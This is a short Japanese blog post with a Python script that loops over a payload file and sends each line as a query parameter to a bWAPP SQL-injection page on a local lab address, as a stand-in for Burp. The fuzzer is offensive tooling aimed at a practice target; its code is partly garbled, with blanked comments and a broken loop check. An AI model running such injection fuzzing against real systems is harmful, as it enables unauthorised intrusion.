python発注器


python発注器
今日は発注器を書いて遊ぶ前にburpツールで発注テストをしただけで、burpがないときも気まずいです.
pythonなら書くのも早いですが、主に自分のニーズに合わせて変えることができます.
#!/usr/bin/python3

import os
import sys,time
import requests
from requests.packages import urllib3

#  cookie     
connection = requests.Session()

#  imperva           false
urllib3.disable_warnings()        #  https     

f=open(".\\   payload.txt","r",encoding="utf-8")
#print("       ???")
#a=int(input())
b=0

date = {                                                          #      
    "age":22,
    "name":"zet"
}

headers = {                                                       #      
    "Cookie":"security_level=0; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=ejktn0f0a6hdbjs2g1rn6ics56"
}

for i in f:
    #print("payload is :"+ i.strip())
    qingqiouneirong = 'http://192.168.1.63/bWAPP/sqli_1.php?title=%s&action=search' %i        #     %s  payload     
    response1=connection.get(qingqiouneirong,verify=False,headers=headers)       #                
    #print(response1.text)                       #      
    #response_code=response1.status_code          #     
    #print(response_code)
    #print(response1.text)
    '''
    if response_code == 200:        #              
        print(i)
    '''
    time.sleep(0)           #    
    b +=1
    if b==f:
        break
print("ok")

発注器のpayload.txtは同級ディレクトリの下に置けばいいです.